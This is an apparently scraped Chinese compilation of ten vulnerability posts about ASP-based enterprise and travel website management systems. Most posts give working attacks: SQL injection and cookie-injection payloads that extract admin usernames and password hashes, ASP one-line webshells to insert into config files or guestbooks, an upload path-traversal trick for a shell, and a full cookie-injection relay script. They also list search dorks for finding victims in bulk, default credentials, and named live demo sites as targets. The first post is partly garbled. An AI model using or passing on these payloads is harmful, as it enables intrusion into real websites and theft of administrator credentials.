蓝科企业网站管理系统中英繁版V1.0 漏洞漏洞预警
“预见简简单单”通过精心收集,向本站投稿了10篇蓝科企业网站管理系统中英繁版V1.0 漏洞漏洞预警,以下是小编为大家准备的蓝科企业网站管理系统中英繁版V1.0 漏洞漏洞预警,仅供参考,欢迎大家阅读。
篇1:蓝科企业网站管理系统中英繁版V1.0 漏洞漏洞预警
蓝科企业网站管理系统中英繁版V1.0 漏洞@程序- - 怎看也像 w78 程序
後台像- - B 搜索字搜出淼囊惨- - (可是文件名不同啊- -)
]什N- -ewebeditor 5.5 上髀┒
搜索字:inurl:eshowshop.asp?id=
分e?在於多了一E SHOP......- -
篇2:驾校培训网站管理系统 v1.0 漏洞漏洞预警
<%
Set rsnews=Server.CreateObject(“ADODB.RecordSet”)
sql=“update news set hits=hits+1 where id=”&cstr(request(“id”))
conn.execute sql
单纯的reuqest,并没用指定是request.querystring(),还是request.form,或request.cookie ().
EXP:
localhost/jiaxiao/shownews.asp
javascript.:alert(document.cookie=“id=”+escape(“107 and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11 from admin”))
篇3:shypostShyPost企业网站管理系统 若干漏洞漏洞预警
ShyPost企业管理系统拥有十几种模板,用户可自由选择,不同模板后台管理功能是一样的,以下 为其中一个模板的前后台测试,欢迎用户测试,
后台演示: www.shypost.com/demo/admin
测试帐号: admin 密码 admin
前台演示: www.shypost.com/demo
销售价格:350元/套
1、注入:
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin
拿shell:
网站配置中插入:“%><%eval request(”a“)%><%s=”
连接 yoursite.com/inc/config.asp
2、写马:
留言本写入一句话,连接www.badguest.cn/databases/databases.asp
3、其它若干问题
篇4:6CMS企业网站管理系统(中英繁三语版) sql注射漏洞漏洞预警
g.cn关键字:6CMS企业望站管理系统(中英繁三语版)
默认帐号密码:admin
后台:admin/
也不知道程序员怎么弄得,我看到程序admin目录下有个防注入的sql.asp
但是上级目录却没有
默认数据库:data/#sze7xiaohu.mdb
seeion验证感觉也有点乱来,记得有个admin目录下发布职位的文件可以直接访问(具体哪个文件),貌似可以直接发布消息
直接放啊D,
6CMS企业网站管理系统(中英繁三语版) sql注射漏洞漏洞预警
,
后台也直接数据库备份。
感觉没啥利用价值。没意思,自己当研究玩吧
作者:猴子
篇5:网趣网站管理系统上传漏洞漏洞预警
程序:网趣网站管理系统1.2.1 (包含动态版和静态版 均存在此漏洞)
下载:www.codepub.com/d/downpage.php?n=1&id=18716::1288173021
FROM:www.st999.cn/blog
DATA:/04/22
利用方法:/ku_edit/ComquUp.asp?nf=&ni=a&nr=ok&nt=../st999.asp;&nm=&nq=&lx=1
漏洞文件:Free_ComQu\Ku_edit\ComquUp.asp
源码 :
<%Response.Buffer=True
Server.ScriptTimeOut=9999999
On Error Resume Next%>
酷航文件上传系统V2
<%
response.Cookies(“ComquUp”)=“1”
'您可以把上面判断cookies的写入语句复制到您登录的地方,这样便是“只有登录后才能操作上传文件,”
if request.Cookies(“ComquUp”)=“1” then%>
<%
ComquDFormName=trim(request(“nf”))
ComquDInputName=trim(request(“ni”))
ComquDYNReName=trim(request(“nr”))
ComquDPath=trim(request(“nt”))
ComquDDM=trim(request(“nm”))
ComquDPathQ=trim(request(“nq”))
ComquDType=trim(request(“lx”))
if ComquDPath“” then:ComquSavePath=ComquDPath:else:ComquSavePath=“/Upfile/edit/”:end if
if ComquDPathQ“” then:ComquSavePathQ=ComquDPathQ:else:ComquSavePathQ=ComquSavePath:end if
ComquYNPath(ComquSavePath)
if ComquDType=“1” then
ComquFileNames=“jpg,gif,png,bmp”
ComquBigSize=1024000'单位B
elseif ComquDType=“2” then
ComquFileNames=“swf,flv”
ComquBigSize=10240000
elseif ComquDType=“3” then
ComquFileNames=“avi,wmv,asf,mov,mp3,wma”
ComquBigSize=102400000
elseif ComquDType=“4” then
ComquFileNames=“rm,ra,ram,rmvb”
ComquBigSize=102400000
elseif ComquDType=“5” then
ComquFileNames=“txt,rar,zip,doc,7z,ppt”
ComquBigSize=102400000
end if
ComquFileSize=Request.TotalBytes
If ComquFileSize>0 Then
if ComquFileSize Set ComquUpStm=Server.CreateObject(“ADODB.Stream”) ComquUpStm.Type=1 ComquUpStm.Open ComquUpStm.Write Request.BinaryRead(ComquFileSize) ComquUpStm.Position=0 ComquFormDataSize=ComquUpStm.Read ComquCrlf=chrB(13)&chrB(10) ComquFormStart=InStrB(ComquFormDataSize,ComquCrlf) ComquFormEnd=InStrB(ComquFormStart+1,ComquFormDataSize,ComquCrlf) Set ComquFormStm=Server.Createobject(“ADODB.Stream”) ComquFormStm.Type=1 ComquFormStm.Open ComquUpStm.Position=ComquFormStart + 1 ComquUpStm.CopyTo ComquFormStm,ComquFormEnd-ComquFormStart-3 ComquFormStm.Position=0 ComquFormStm.Type=2 ComquFormStm.CharSet=“GB2312” ComquFormStmText=ComquFormStm.Readtext ComquFormStm.Close ComquUpFileNAll=Mid(ComquFormStmText,InstrRev(ComquFormStmText,“\”)+1,ComquFormEnd) ComquUpFileCZM=mid(ComquUpFileNAll,InstrRev(ComquUpFileNAll,“.”)) If ComquCheckFileCZM(ComquUpFileNAll) Then if ComquDDM“” then ComquUpFileName=ComquDDM else if ComquDYNReName“ok” then:ComquUpFileName=ComquUpFileNAll:else:ComquUpFileName=Year(now)&right(“0”&Month(now),2)&right(“0”&Day(now),2)&right(“0”&Hour(now),2)&right(“0”&Minute(now),2)&right(“0”&Second(now),2)&right(replace(Request.ServerVariables(“REMOTE_ADDR”),“.”,“”),4)&ComquUpFileCZM:end if end if ComquSaveFile=Server.MapPath(ComquSavePath & ComquUpFileName) k=Instrb(ComquFormDataSize,ComquCrlf&ComquCrlf)+4 l=Instrb(k+1,ComquFormDataSize,leftB(ComquFormDataSize,ComquFormStart-1))-k-2 ComquFormStm.Type=1 ComquFormStm.Open ComquUpStm.Position=k-1 ComquUpStm.CopyTo ComquFormStm,l ComquFormStm.SaveToFile ComquSaveFile,2
if ComquDFormName“” then:Response.write“”:else:Response.write“”:end if
Response.write“”&left(ComquSaveFileName,3)&“**”&ComquUpFileCZM&“ 上传成功! 重新上传
”
Else
Response.write“文件格式不正确! 重新上传文 件
”
End If
Set ComquFormStm=Nothing
UploadStream.Close
Set UploadStream=Nothing
Function ComquCheckFileCZM(FileName)
FileType=Split(ComquFileNames,“,”)
For i=0 To Ubound(FileType)
If LCase(Right(FileName,len(FileType(i))))=LCase(FileType(i)) then
ComquCheckFileCZM=True
Exit Function
Else
ComquCheckFileCZM=False
End if
Next
End Function
Function ComquYNPath(FolderName)
ComquFolderM=Server.Mappath(FolderName)
Set Fso=CreateObject(“Scripting.FileSystemObject”)
If Not Fso.FolderExists(ComquFolderM) Then
Fso.CreateFolder(ComquFolderM)
End If
Set Fso=Nothing
End Function
else
Response.Write“大小超过”&ComquBigSize&“B! 重新上传
”
end if
Else%>
<%End if
else:response.Write(“您无权上传操作!”):end if%>
嘿嘿,,,很明显的nt参数未过滤,可以构造路径,直接上传获得shell,
此程序的官方演示地址,也存在着这漏洞。
main.comqu.com/ku_edit/ComquUp.asp?nf=&ni=a&nr=ok&nt=../st999.asp;&nm=&nq=&lx=1
直接找个jpg的马儿上传,右键查看源码,获得名称../st999.asp;st999.asp;0429371540.jpg,实际上马儿的名称是st999.asp;201104220019371540.jpg,shell地址就是upload/2011/4/201104221740280470.jpg
这个是一句话,密码是st999,大家就不要轮J官方的演示站了,嘿嘿。。。
篇6:仙游旅行社管理系统v1.0漏洞及修复漏洞预警
Author:mer4en7y
Blog:www.hi.baidu.com/alonecode
1)注入漏洞:
漏洞文件:new_list.asp:
bid = trim(request(“bid”))
sid = trim(request(“sid”))
…
if bid“” then
bwhere = “ and bigid=”& bid &“”
else
bwhere = “”
end if
if sid“” then
swhere = “ and smallid=”& sid &“”
else
swhere = “”
end if
idsql=“select * from lxscms_n where shenhe=1”& bwhere & swhere &“ order by id desc”
表名:lxscms_u字段:qwbmuname,qwbmupwds
默认后台:/admin
2)数据库默认地址:
/admin/#a&_as12=b.as.mdb
修复:new_list.asp页面过滤参数输入,
仙游旅行社管理系统v1.0漏洞及修复漏洞预警
,
修改默认数据库地址,做防下载处理
篇7:凡诺企业网站管理系统上传漏洞漏洞预警
凡诺企业网站管理系统上传漏洞,该程序在源码之家月排行第三,下载量还是很大的。
与其说是漏洞,还不如说是疏忽,“漏洞”是编辑器fckeditor的测试上传页面没有删除,给 创造了可乘之机,
谷歌和百度关键字:凡诺企业网站管理系统 或者admin/pf_login.asp
可以用挖掘鸡批量抓,很多的。
利用方法:
www.****.com/admin/fckeditor/editor/filemanager/connectors/test.html
上传***.asp;.gif或者****.asp;gif文件,利用IIS的解析漏洞,不多说了,大家都懂的……
篇8:CGSAIL网站管理系统 0day漏洞预警
<%
dim sql
dim rs
sql = “select * from [”&CgsailPrefix&“admin] where id=”&request(“id”)
Set rs = Server.CreateObject(“ADODB.RecordSet”)
rs.Open sql,conn,1,1
photo=trim(rs(“photo”))
%>
localhost/user_view.asp?id=1%20and%201=1
篇9:良精企业网站管理系统V09漏洞漏洞预警
涉及版本:良精企业网站管理系统(2007-V09)官方正式商业版
其他版本未做测试
/*应该是所有的*/
漏洞文件:
EnProductShow.asp /*后续版本*/
Product_Show.asp /*早期版本*/
ProductShow.asp /*后期版本*/
其实都是一样的-_-!
漏洞描述:
变量ID信任客户端提交值,带入sql语句查询,程序用了通用SQL防注入程序,详细见Check_Sql.asp,关键代码如下
****************************************************************************
[复制到剪贴板]
CODE:
ID=trim(request(”ID”))
if ID=”“ then
response.Redirect(”EnProduct.asp”)
end if
sql=”select * from Product where ID=” & ID & “”
Set rs= Server.CreateObject(”ADODB.Recordset”)
rs.open sql,conn,1,3
if rs.bof and rs.eof then
response.write””
else
rs(”Hits”)=rs(”Hits”)+1
rs.update
****************************************************************************
Check_Sql.asp仅对GET和POST的数据进行了过滤,忽略了Cookie利用方法:
Google搜索关键字 inurl:”EnProductShow.asp?id=”
cookie注入,支持union,Product表26个字段,演示如下
localhost/EnProductShow.asp?ID=229
javascript.:alert(document.cookie=”id=”+escape(”229 union select 0,1,2,3,4,5,6,username,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from admin”))
localhost/EnProductShow.asp
即可union出管理员帐号,密码(md5值)
后台地址
/admin/login.asp
后台拿shell方法很多。略过
补充:南方数据企业网站管理系统 ver10.0,漏洞和这个是一样的,利用的方法也大致相同,只是admin的字段数目不一样而已
/*―――――――――-xiao.k的注释&补充_0614―――――――――-*/
本来自己也在分析这个系统的,既然tr4c3在很久之前就分析了.我也没啥必要去看了.
发现的问题就是union不能alert出pwd.
我的方法是中转cookies注入,脚本原型来自jmdcw
########################################################
[复制到剪贴板]
CODE:
< %
ID=request(”ID”)’确认id存在!
JmdcwName=escape(ID)
JmStr=”id=”&JmdcwName
url=request(”url”)
if request(”mod”)=”1″ then
url2=”Product_Show.asp” ‘早期版本
else
url2=”ProductShow.asp” ‘后期版本
end if
Url=””&url&”/”&url2 ‘请自行修改
JMUrl=url
JmRef=url
JmCok=”ASPSESSIONIDAQACTAQB=HKFHJOPDOMAIKGMPGBJJDKLJ”
JmCok=JmCok & “;” & Jmstr &”;”
JmCok=URLEncoding(JmCok)
jmstr=””
response.write PostData(JMUrl,JmStr,JmCok,JmRef)
Function PostData(PostUrl,PostStr,PostCok,PostRef)
Dim Http
Set Http = Server.CreateObject(”msxml2.serverXMLHTTP”)
With Http
.Open “POST”,PostUrl,False
.SetRequestHeader “Content-Length”,Len(PostStr)
.SetRequestHeader “Content-Type”,”application/x-www-form-urlencoded”
.SetRequestHeader “Referer”,PostRef
.SetRequestHeader “Cookie”,PostCok
.Send PostStr
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = “”
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function
Function URLEncoding(vstrin)
strReturn=”“
Dim i
For i=1 To Len(vstrin)
ThisChr=Mid(vstrin,i,1)
if Abs(Asc(ThisChr))< &HFF Then
strReturn=strReturn & ThisChr
Else
InnerCode=Asc(ThisChr)
If InnerCode<0 Then
InnerCode=InnerCode + &H10000
End If
Hight1=(InnerCode And &HFF00) \&HFF
Low1=InnerCode And &HFF
strReturn=strReturn & “%” & Hex(Hight1) & “%” & Hex(Low1)
End if
Next
URLEncoding=strReturn
End Function
% >
########################################################
保存为cookies.asp
usage:
blog.sadk.org/temp/02/cookies.asp?mod=2&url=admin.asp99.cn/ljweb2007&id=80
注意:需要添加关键字的.
id一定要存在
直接在配置里写马 ”%><%execute(request(“tmd”))%><%Response.End’
篇10:智有道专业旅游系统 v1.0 漏洞漏洞预警
默认信息:
“智有道”专业旅游网站系统是智有道团队专业开发,针对目前的旅游平台进行强大的功能开发!
后台管理
后台路径:admin/login.asp
管理员:user:admin
密码:psw:123456
下载地址:down.chinaz.com/soft/30295.htm
Demo Url:will2011.w701.hzdemo.cn/
exp:
will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15,16,17 from admin
或者:
will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
遍历目录:
www.0855.tv/admin/do/admin_uploadfile.asp?id=1&dir=../..
其它:
www.0855.tv/admin/do/Admin_Style.asp
www.0855.tv/admin/do/data.asp
关键字:
为防批量,特略,
智有道专业旅游系统 v1.0 漏洞漏洞预警
,
【蓝科企业网站管理系统中英繁版V1.0 漏洞漏洞预警】相关文章:






文档为doc格式